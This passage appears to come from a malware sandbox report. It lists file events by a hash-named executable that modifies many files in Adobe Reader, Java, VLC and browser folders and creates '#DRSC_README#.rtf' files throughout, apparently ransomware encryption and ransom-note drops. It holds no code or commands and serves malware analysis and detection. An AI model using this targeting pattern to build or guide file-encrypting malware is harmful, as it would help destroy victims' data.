Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses_selected-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_multi_filetype.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\files_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\id_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\java-rmi.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaSansDemiBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_radio_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\pack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fil_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\UnifiedShare.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-en_us.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-focus_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\lt_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\dnsns.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ReadCheckpoint.asx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\iw_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_organize_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-text.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\vscroll-thumb.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ko_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_fw.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-default_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\de_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\cstm_brand_preview2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\ui-strings.js 